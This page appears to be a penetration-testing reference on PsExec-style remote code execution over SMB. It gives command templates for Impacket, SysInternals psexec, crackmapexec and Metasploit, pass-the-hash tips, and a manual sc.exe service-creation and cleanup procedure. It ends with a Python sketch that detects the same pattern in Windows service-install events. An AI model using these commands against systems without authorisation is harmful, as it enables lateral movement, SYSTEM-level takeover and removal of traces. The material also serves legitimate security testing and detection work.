# PsExec (tcp/445)

PsExec is an old trick introduced by Mark Russinovich that allows remote code execution over SMB (tcp/445).

This trick requires establishing an SMB session with the target and is performed through the following steps:

• Copy an executable file containing your payload to the target (usually under ADMIN$)
• Create a new service that will run the executable
• Start the service

Once the payload has been executed, the following steps are performed to clean up:

• Delete the service
• Delete the executable file

Because it needs to interact with the Service Control Manager, it requires administrative privileges.

Note

The interaction with the Service Control Manager is possible via RPC calls performed over the SMB session. Thus, no access to other RPC ports is required.

#### Impacket - psexec.py

```
psexec.py [DOMAIN/]<USERNAME>[:PASSWORD]@<HOST> [command]
```

• If you don't specify any [command], it will run a semi-interactive shell (C:\>)
• If you don't specify any [PASSWORD], it will prompt you to input the password interactively

Tip

Use -hashes LMHASH:NTHASH instead of specifying a password to authenticate using the pass-the-hash technique.

Info

This tool will execute commands as NT AUTHORITY\system instead of the user specified for authentication.

#### SysInternals - psexec.exe

```
psexec.exe -nobanner -accepteula \\<HOST> -u [DOMAIN\]<USERNAME> -r [SERVICE NAME] [command]
```

| Option | Description |
| --- | --- |
| -d | Runs the command detached, i.e. in the background, without any interaction with stdin and stdout |
| -s | Runs the command with local SYSTEM privileges |

Tip

Instead of specifying the username and password on the psexec.exe command line, you can also establish an SMB session with the target or start a new command prompt with NETONLY credentials.

#### crackmapexec

```
crackmapexec <HOST/CIDR> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --exec-method smbexec -x <CMD>
```

Tip

Use -H [NTHASH] instead of -p [PASSWORD] to authenticate using the pass-the-hash technique.

Note

Use a capital -X to execute a PowerShell command instead.

#### Metasploit - exploit/windows/smb/psexec

```
use exploit/windows/smb/psexec
set RHOST <IP ADDRESS>
set SMBUser <USERNAME>
set SMBDomain <DOMAIN>
set SMBPass <PASSWORD>
set payload <meterpreter/reverse shell/cmd>
run -j
```

Tip

The SMBPass parameter also supports using a hash instead of a password.

Info

This module will execute commands as NT AUTHORITY\system instead of the user specified for authentication.

Warning

This module will not display the output of the executed payload.

#### Manual

First, establish an SMB session with the target or start a new command prompt with NETONLY credentials:

```
net use \\<HOST> /user:[DOMAIN\]<USERNAME>
runas /netonly /user:[DOMAIN\]<USERNAME> cmd.exe
```

Then, copy the executable file to the target through the SMB session:

```
copy \path\to\executable \\<HOST>\ADMIN$
```


Note

The ADMIN$ share usually maps to C:\Windows. Even though this is the location psexec normally uses, you can drop the executable wherever you want.

Then, create and start the service that will call the executable:

```
sc.exe \\<HOST> create <SERVICE NAME> binpath= "cmd.exe /k <\path\to\executable>"
sc.exe \\<HOST> start <SERVICE NAME>
```


Info

As the Service Control Manager expects a service executable, it may report that the service failed to start when given a standard executable. This is because the executable never makes the API call that tells the Service Control Manager the service started successfully; in that case, the Service Control Manager terminates the process after 30 seconds. That is why cmd.exe /k is placed before the desired command: with this trick, the cmd.exe process is terminated, but not its child process.

Finally, you can clean the service and executable once the payload has been executed:

```
sc.exe \\<HOST> delete <SERVICE NAME>
del \\<HOST>\path\to\executable
```
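The procedure above leaves a visible trace on the target: a new service whose binPath points at a freshly dropped file in ADMIN$, usually wrapped in cmd.exe /k. The following detection sketch, added here and not part of the original page, scores exported service-install records (System event 7045) against those two traits; the KEY=VALUE;KEY=VALUE line layout and the sample events are constructed for the example.

```python
"""Flag service-install events matching the PsExec pattern described above.
Added example, not code from the original page. Assumes System event 7045
records were exported as KEY=VALUE;KEY=VALUE lines (a constructed layout)."""
import re
from dataclasses import dataclass

# Both heuristics come from the manual procedure: the payload is dropped in
# ADMIN$ (C:\Windows) and the binPath wraps it in "cmd.exe /k" so that the
# SCM's 30-second timeout kills only the wrapper, not the child process.
CMD_WRAPPER = re.compile(r'(^|[\\\s"])(cmd(\.exe)?|%comspec%)\s+/[kc]\b', re.I)
ADMIN_SHARE_ROOT = re.compile(r'^"?[a-z]:\\windows\\[^\\]+\.exe"?(\s|$)', re.I)

@dataclass
class ServiceInstall:
    host: str
    service_name: str
    image_path: str
    start_type: str

def parse_event(line: str) -> ServiceInstall:
    fields = dict(kv.split("=", 1) for kv in line.strip().split(";"))
    return ServiceInstall(fields["Host"], fields["ServiceName"],
                          fields["ImagePath"], fields["StartType"])

def psexec_indicators(ev: ServiceInstall) -> list:
    """Return the reasons this install looks like PsExec (empty = benign)."""
    reasons = []
    if CMD_WRAPPER.search(ev.image_path):
        reasons.append("binPath wraps the payload in cmd.exe /k")
    if ADMIN_SHARE_ROOT.match(ev.image_path):
        reasons.append("binary sits directly in C:\\Windows (the ADMIN$ root)")
    # Start type alone proves nothing; record it only as supporting evidence.
    if reasons and ev.start_type.lower() == "demand start":
        reasons.append("demand-start service, typical of a one-shot launcher")
    return reasons

def scan(lines):
    """Map (host, service name) -> reasons for every suspicious install."""
    flagged = {}
    for line in lines:
        ev = parse_event(line)
        reasons = psexec_indicators(ev)
        if reasons:
            flagged[(ev.host, ev.service_name)] = reasons
    return flagged
# Constructed sample events: one legitimate service and two PsExec-style ones.
SAMPLE_EVENTS = [
    "Host=WS01;ServiceName=Spooler;ImagePath=C:\\Windows\\System32\\spoolsv.exe;StartType=auto start",
    "Host=WS01;ServiceName=ubxqtlma;ImagePath=cmd.exe /k C:\\Windows\\payload.exe;StartType=demand start",
    'Host=FS02;ServiceName=upd;ImagePath="C:\\Windows\\upd.exe";StartType=demand start',
]
```

Feed `scan()` your own export of 7045 events; a service under C:\Windows that also appears in a file-write (5145) event against ADMIN$ moments earlier is the strongest correlation.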